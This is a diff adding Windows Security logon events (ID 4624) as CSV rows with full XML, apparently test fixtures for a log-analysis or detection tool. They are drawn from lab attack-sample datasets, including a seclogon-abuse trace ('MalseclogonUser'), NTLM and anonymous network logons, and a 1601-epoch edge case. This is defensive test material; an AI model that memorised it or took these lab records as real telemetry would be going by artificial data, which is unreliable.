+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-13T22:04:58.363696+04:00,1550081098.363696,4624,admin01,EXAMPLE,10,User32,127.0.0.1,PC01,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:04:58.363696Z"">
+    </TimeCreated>
+    <EventRecordID>227762</EventRecordID>
+    <Correlation ActivityID=""94862AEA-0C0C-4B98-88B1-A269075A77E2"">
+    </Correlation>
+    <Execution ProcessID=""520"" ThreadID=""3980"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1108</Data>
+    <Data Name=""TargetUserName"">admin01</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x14a321</Data>
+    <Data Name=""LogonType"">10</Data>
+    <Data Name=""LogonProcessName"">User32 </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">PC01</Data>
+    <Data Name=""LogonGuid"">AF83A89C-C68A-5397-5AC6-24A0C4D2BAF6</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x4b8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\winlogon.exe</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">49274</Data>
+  </EventData>
+</Event>"
+2019-02-13T22:04:57.462400+04:00,1550081097.4624,4624,admin01,EXAMPLE,3,NtLmSsp,-,PC02,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:04:57.442372Z"">
+    </TimeCreated>
+    <EventRecordID>227747</EventRecordID>
+    <Correlation ActivityID=""FF684E42-4C42-4957-A95F-F8957CF3A4B8"">
+    </Correlation>
+    <Execution ProcessID=""520"" ThreadID=""3980"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1108</Data>
+    <Data Name=""TargetUserName"">admin01</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x148f5d</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">PC02</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T22:04:45.905783+04:00,1550081085.905783,4624,admin01,EXAMPLE,3,NtLmSsp,-,PC02,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:04:43.171852Z"">
+    </TimeCreated>
+    <EventRecordID>227740</EventRecordID>
+    <Correlation ActivityID=""44F141EB-B63A-462B-9DEE-3998C9913055"">
+    </Correlation>
+    <Execution ProcessID=""520"" ThreadID=""3980"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1108</Data>
+    <Data Name=""TargetUserName"">admin01</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x14871d</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">PC02</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T22:02:05.418087+04:00,1550080925.418087,4624,user01,EXAMPLE,7,Negotiat,-,PC01,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:02:04.526806Z"">
+    </TimeCreated>
+    <EventRecordID>227708</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""520"" ThreadID=""3420"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
+    <Data Name=""TargetUserName"">user01</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x1414d9</Data>
+    <Data Name=""LogonType"">7</Data>
+    <Data Name=""LogonProcessName"">Negotiat</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">PC01</Data>
+    <Data Name=""LogonGuid"">42DAF7A9-F185-F292-0EBD-B86A26624D31</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x208</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T22:02:04.436676+04:00,1550080924.436676,4624,user01,EXAMPLE,11,User32,127.0.0.1,PC01,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:02:04.426662Z"">
+    </TimeCreated>
+    <EventRecordID>227701</EventRecordID>
+    <Correlation ActivityID=""AD38FF07-BC05-4620-A79A-51E18F454768"">
+    </Correlation>
+    <Execution ProcessID=""520"" ThreadID=""1920"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
+    <Data Name=""TargetUserName"">user01</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x1414c8</Data>
+    <Data Name=""LogonType"">11</Data>
+    <Data Name=""LogonProcessName"">User32 </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">PC01</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x704</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\winlogon.exe</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">0</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.616154Z"">
+    </TimeCreated>
+    <EventRecordID>329918</EventRecordID>
+    <Correlation ActivityID=""B04CB785-EBD3-0000-16B8-4CB0D3EBD701"">
+    </Correlation>
+    <Execution ProcessID=""636"" ThreadID=""7156"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1bc4</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">MalseclogonUser</Data>
+    <Data Name=""TargetOutboundDomainName"">MalseclogonDomain</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:42:00.800072Z"">
+    </TimeCreated>
+    <EventRecordID>21373</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""9984"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x82215a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63652</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:41:54.272334Z"">
+    </TimeCreated>
+    <EventRecordID>21371</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""740"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x821f28</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63652</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:41:47.653255Z"">
+    </TimeCreated>
+    <EventRecordID>21369</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""740"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x821aab</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63652</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:41:37.642369Z"">
+    </TimeCreated>
+    <EventRecordID>21367</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""10224"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x820d61</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63640</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-11-15T08:19:16.102509Z"">
+    </TimeCreated>
+    <EventRecordID>25049</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""516"" ThreadID=""308"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>alice.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x1d12916</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">59336</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:57.263194Z"">
+    </TimeCreated>
+    <EventRecordID>2171296</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""632"" ThreadID=""2504"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x21aadb8</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">860D1189-6C67-C57B-59ED-C0676A052019</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">62863</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-02T15:47:57.263194+04:00,1599047277.263194,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:57.252932Z"">
+    </TimeCreated>
+    <EventRecordID>2171295</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""632"" ThreadID=""2512"">
+    </Execution>
+    <Channel>Security</Channel>
